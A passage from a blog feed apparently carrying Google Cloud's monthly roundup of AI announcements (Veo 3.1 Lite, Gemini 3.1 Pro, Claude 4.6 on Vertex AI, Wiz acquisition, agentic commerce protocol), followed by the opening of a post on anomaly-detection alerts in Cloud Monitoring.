&lt;li&gt;&lt;a href="https://blog.google/innovation-and-ai/technology/ai/veo-3-1-lite/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Build with Veo 3.1 Lite, our most cost-effective video generation model&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;This model empowers developers to build high-volume video applications, at less than 50% of the cost of Veo 3.1 Fast, but with the same speed. This rounds out the Veo 3.1 model family, giving developers flexibility based on needs. For Cloud customers, it’s now &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/veo-3-1-lite-and-a-new-veo-upscaling-capability-on-vertex-ai?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;available on Vertex AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here’s a fun bonus: Check out our &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/ultimate-prompting-guide-for-veo-3-1?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;ultimate prompting guide for Veo 3.1&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to get started.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=1BySW9YaSME"&gt;

      
        

        &lt;div class="article-video__aspect-image"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Veo 3.1 Lite&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=1BySW9YaSME"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/google-completes-acquisition-of-wiz?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Welcoming Wiz to Google Cloud: Redefining security for the AI era: &lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;Google has completed its acquisition of Wiz, a leading cloud and AI security platform. The Wiz team will join Google Cloud, and we will retain the Wiz brand. With the addition of Wiz, we will provide customers with a comprehensive platform to secure their cloud and hybrid environments, as well as accelerate threat prevention, detection, and response.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-1-flash-live/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini 3.1 Flash Live: Making audio AI more natural and reliable: &lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;We’ve improved 3.1 Flash Live’s overall quality, making it more reliable for developers and enterprises to build voice-first agents that can complete complex tasks at scale. On ComplexFuncBench Audio, a benchmark that captures multi-step function calling with various constraints, it leads with a score of 90.8% compared to our previous model.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;News you can use: &lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/ultimate-prompting-guide-for-nano-banana?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;The ultimate Nano Banana prompting guide:&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;This is a must-read for anyone working with Nano Banana. We spent weeks testing Nano Banana 2 and Nano Banana Pro against every use case we could imagine to test its limits. We put together this guide to share exactly what we learned and how you can get the best results. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Here’s an example formula: [Reference images] + [Relationship instruction] + [New scenario]&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_hJWjDOO.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/products/compute/training-large-models-on-ironwood-tpus?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;A developer’s guide to training with Ironwood TPUs&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;In this guide, we hear from Lillian Yu, CPA, CA , Product Strategy and Operation, and Liat Berry, Product Manager, on five strategies within the JAX and MaxText ecosystems designed to help developers refine training efficiency and hit peak performance on Ironwood hardware.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/how-to-build-ai-agents-with-google-managed-mcp-servers?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;How to build production-ready AI agents with Google-managed MCP servers&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;In this guide, we anchor on a specific example. Cityscape is a demo agent built with Google's Application Development Kit (ADK) that turns a simple text prompt — like "Generate a cityscape for Kyoto" — into a unique, AI-generated city image. Check out the guide to learn more. &lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cool stuff customers built. &lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;hr /&gt;
&lt;h2 style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;February&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In February, we’re giving developers more reasoning power with Gemini 3.1 Pro and Claude 4.6, and faster creative scaling with Nano Banana 2. We’re also opening up new training programs and step-by-step guides to help you tackle the hardest parts of the AI lifecycle, from capacity planning to mounting defenses against AI-powered attacks.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here’s a rundown of our latest news, tools, and resources to help you build what’s next.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Top hits&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/bringing-nano-banana-2-to-enterprise"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Pro-level image generation gets faster and more accessible with Nano Banana 2&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; To build creative that stands out, you need models that naturally integrate into your workflows and scale with ease. Check out &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/bringing-nano-banana-2-to-enterprise"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;our blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to see how this comes to life (and how customers are putting the model to work).&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/2_3KCMDRE.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/gemini-3-1-pro-on-gemini-cli-gemini-enterprise-and-vertex-ai"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Introducing Gemini 3.1 Pro on Google Cloud:&lt;/strong&gt;&lt;/a&gt; &lt;span style="vertical-align: baseline;"&gt;Gemini 3.1 Pro is a clear step forward in reasoning, designed to solve tougher problems, giving you the reasoning depth your business needs. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Gemini 3.1 Pro is available starting today in preview in &lt;/span&gt;&lt;a href="https://cloud.google.com/vertex-ai"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Vertex AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Developers can access the model in preview via the Gemini API in &lt;/span&gt;&lt;a href="https://aistudio.google.com/prompts/new_chat?model=gemini-3.1-pro-preview" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google AI Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://developer.android.com/studio" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Android Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://antigravity.google/blog/gemini-3-1-in-google-antigravity" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Antigravity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://geminicli.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini CLI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/expanding-vertex-ai-with-claude-opus-4-6"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Announcing Claude Opus 4.6 and Claude Sonnet 4.6 on Vertex AI:&lt;/strong&gt;&lt;/a&gt; &lt;span style="vertical-align: baseline;"&gt;Now generally available on Vertex AI, explore our &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/vertex-ai-samples/blob/main/notebooks/official/generative_ai/anthropic_claude_intro.ipynb" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;sample notebook&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to get started and visit our &lt;/span&gt;&lt;a href="https://cloud.google.com/vertex-ai/generative-ai/pricing#claude-models"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for comprehensive pricing and regional availability details.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-new-ai-threats-report-distillation-experimentation-integration"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;New AI threats report: Distillation, experimentation, and integration&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: John Hultquist, chief analyst, Google Threat Intelligence Group, details what security leaders should know from our newest AI threat report on experimentation, integration, and distillation attacks.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;News you can use&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/a-devs-guide-to-production-ready-ai-agents"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;A developer's guide to production-ready AI agents&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;To help developers work through these challenges, we've published a collection of guides covering the full agent lifecycle. These resources first appeared during Kaggle’s &lt;/span&gt;&lt;a href="https://blog.google/innovation-and-ai/technology/developers-tools/ai-agents-intensive-recap/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;5 days of AI Agents Intensive&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and they’ve proven so popular and useful, we wanted to make sure a wider audience had access, as well. &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/gear-program-now-available"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Ready (GEAR) program now available:&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;We opened the Gemini Enterprise Agent Ready (GEAR) learning program to everyone. As a new specialized pathway within the Google Developer Program, GEAR empowers developers and pros to build and deploy enterprise-grade agents with Google AI.&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/provisioned-throughput-on-vertex-ai"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Your guide to Provisioned Throughput (PT) on Vertex AI:&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Check out this deep-dive blog designed to show you the resources available to you today on Vertex AI, and how you can get started capacity planning. &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/transform/how-ai-can-boost-defenders-from-defense-in-depth-to-cyber-kill-chain-qa"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;How AI can boost defenders, from defense in depth to the cyber kill chain (Q&amp;amp;A)&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;We know that defenders are also developing powerful AI tools, but what’s still unknown is what it could mean for enterprise software ownership if companies have to constantly mount AI-directed defenses at AI-powered attacks?&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cool stuff customers built. &lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;hr /&gt;
&lt;h2 style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;Janurary&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We used to have to learn the language of computers. In 2026, they’re learning ours.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We kicked off the year by exploring the future of agentic commerce, where AI agents navigate the web to find and buy products for us. Our leaders call this the "&lt;/span&gt;&lt;a href="https://cloud.google.com/transform/the-invisible-shelf-retail-cpg-agentic-commerce-how-to?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;invisible shelf&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;" — a world where commerce isn't tied to a specific website. To make this reality scalable, we announced the Universal Commerce Protocol (UCP), a shared language that allows agents and retailers to understand each other. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We brought that same fluency to our creative and technical tools:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Updates to Veo 3.1 allow creators to use simple inputs — like reference images — to generate precise, mobile-ready video.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Natural language queries: With Comments to SQL in BigQuery, we’re removing the language barrier to data. Engineers can now write queries by describing their intent in natural language, prioritizing the question over the code.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Let’s dive in.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Top hits &lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;1. &lt;a href="https://www.googlecloudpresscorner.com/2026-01-11-Google-Cloud-Brings-Shopping-and-Customer-Service-Together-with-Gemini-Enterprise-for-Customer-Experience" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise for Customer Experience (CX):&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Specifically built for agentic retail, this platform transforms fragmented search, commerce and service touch points into one seamless journey — whether you need a shopping assistant, a support bot, agentic search or help with merchandising. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;2. &lt;a href="https://developers.googleblog.com/under-the-hood-universal-commerce-protocol-ucp/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;We announced Universal Commerce Protocol (UCP):&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;A new open standard for agentic commerce that works across the entire shopping journey — from discovery and buying to post-purchase support. UCP establishes a common language for agents and systems to operate together across consumer surfaces, businesses and payment providers. So instead of requiring unique connections for every individual agent, UCP enables all agents to interact easily. UCP is built to work across verticals and is compatible with existing industry protocols like Agent2Agent (A2A), Agent Payments Protocol (AP2) and Model Context Protocol (MCP).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;3. &lt;a href="https://blog.google/innovation-and-ai/technology/ai/veo-3-1-ingredients-to-video/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;We updated Veo 3.1, including improvements to Ingredients to Video and Portrait mode:&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Veo is getting more expressive, with improvements that help you create more fun, creative, high-quality videos based on ingredient images, built directly for the mobile format. This includes:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Improvements to Veo 3.1 Ingredients to Video, our capability that lets you create videos based on reference images. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Native vertical outputs for Ingredients to Video (portrait mode) to power mobile-first, short-form video creation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;State-of-the-art upscaling to 1080p and 4K resolution 1 for high-fidelity production workflows.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These updates are launching in the Gemini app, YouTube, Flow, Google Vids, the Gemini API and Vertex AI.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;4. &lt;a href="https://cloud.google.com/blog/products/data-analytics/vibe-querying-with-comments-to-sql-in-bigquery?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Vibe querying with comments-to-SQL:&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; Crafting complex SQL queries can be challenging. Often, engineers simply want to express their data needs in plain English directly within their SQL workflow. That’s why we’re introducing Comments to SQL in BigQuery. This feature makes writing queries using natural language – ‘vibe querying’ – a reality. Learn more in the &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/vibe-querying-with-comments-to-sql-in-bigquery?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;News you &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;can&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; use&lt;/span&gt;&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/mastering-gemini-cli-your-complete-guide-from-installation-to-advanced-use-cases?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Mastering Gemini CLI: Your complete guide from installation to advanced use-cases&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;We’ve teamed up with DeepLearning.ai and are excited to announce a free course – Gemini CLI: Code &amp;amp; Create with an Open-Source Agent. This course isn’t just for developers; we dive into practical use cases for various tasks such as data analysis, content creation, and personalized learning.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/how-google-sres-use-gemini-cli-to-solve-real-world-outages?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;How Google SREs use Gemini CLI to solve real-world outages&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;In this article, we’ll delve into real scenarios that Google SREs are solving today using Gemini 3 (our latest foundation model) and Gemini CLI—the go-to tool for bringing agentic capabilities to the terminal.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/getting-started-with-gemini-3-deploy-your-first-gemini-3-app-to-google-cloud-run?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Getting started with Gemini 3: Deploy your first Gemini 3 app to Google Cloud Run&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;In this blog, we will show you how to vibe code your first app—which leverages the Gemini 3 Flash Preview model and deploy it as a publicly accessible URL on Google Cloud Run. Google AI Studio lets you go from idea to app quickly by using natural language to generate fully functional apps using the power of Gemini 3.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-practical-guidance-building-with-SAIF"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Practical guidance: Building with the Secure AI Framework (SAIF) on Google Cloud&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We know that security and data privacy are the top concern for executives when evaluating AI providers, and security is the top use case for AI agents in a majority of industries. To help you build AI boldly and responsibly, here’s our guide to developing AI with the Secure AI Framework (SAIF) on Google Cloud. &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/transform/truths-about-ai-hacking-every-ciso-needs-to-know-qa"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;The truths about AI hacking that every CISO needs to know (Q&amp;amp;A)&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; How will AI boost threat actors? And what can chief information security officers do about it? Google’s Heather Adkins, vice-president, Security Engineering, explores how securing the enterprise is about to change.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cool stuff customers built.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-related_article_tout"&gt;





&lt;div class="uni-related-article-tout h-c-page"&gt;
  &lt;section class="h-c-grid"&gt;
    &lt;a class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker" href="https://cloud.google.com/blog/products/ai-machine-learning/what-google-cloud-announced-in-ai-this-month-2025/"&gt;
      &lt;div class="uni-related-article-tout__inner-wrapper"&gt;
        &lt;p class="uni-related-article-tout__eyebrow h-c-eyebrow"&gt;Related Article&lt;/p&gt;

        &lt;div class="uni-related-article-tout__content-wrapper"&gt;
          &lt;div class="uni-related-article-tout__image-wrapper"&gt;
            &lt;div class="uni-related-article-tout__image"&gt;&lt;/div&gt;
          &lt;/div&gt;
          &lt;div class="uni-related-article-tout__content"&gt;
            &lt;h4 class="uni-related-article-tout__header h-has-bottom-margin"&gt;What Google Cloud announced in AI this month - 2025&lt;/h4&gt;
            &lt;p class="uni-related-article-tout__body"&gt;Learn about the latest announcements, innovations, and guides when it comes to Google Cloud AI.&lt;/p&gt;
            &lt;div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted"&gt;
              &lt;span class="nowrap"&gt;Read Article
                &lt;svg class="icon h-c-icon" xmlns="http://www.w3.org/2000/svg"&gt;
                  &lt;use xlink:href="#mi-arrow-forward" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
                &lt;/svg&gt;
              &lt;/span&gt;
            &lt;/div&gt;
          &lt;/div&gt;
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;/section&gt;
&lt;/div&gt;

&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/ai-machine-learning/what-google-cloud-announced-in-ai-this-month" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-30T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/management-tools/cloud-monitoring-adds-long-lookback-alert-policies-for-promql</id>
    <title>Anomaly detection using dynamic thresholds and two-year-long alerts in Cloud Monitoring</title>
    <updated>2026-06-30T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Choosing the threshold of an alert policy can be a headache. You have to analyze historical data, aggregate it into semantically meaningful time series, and choose a threshold that matters. If the workload grows, your previously set static threshold might become too low, and your alert might fire too frequently. New workloads might require setting new thresholds, and setting separate thresholds for separate workloads requires creating separate policies, resulting in the annoyance of managing a fleet of mostly similar policies.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Not to mention, some metrics can’t even be alerted on using static thresholds. If your metric varies by time of day, like many e-commerce metrics do, then no single threshold will work. For example, what do you do if your metric looks like this:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
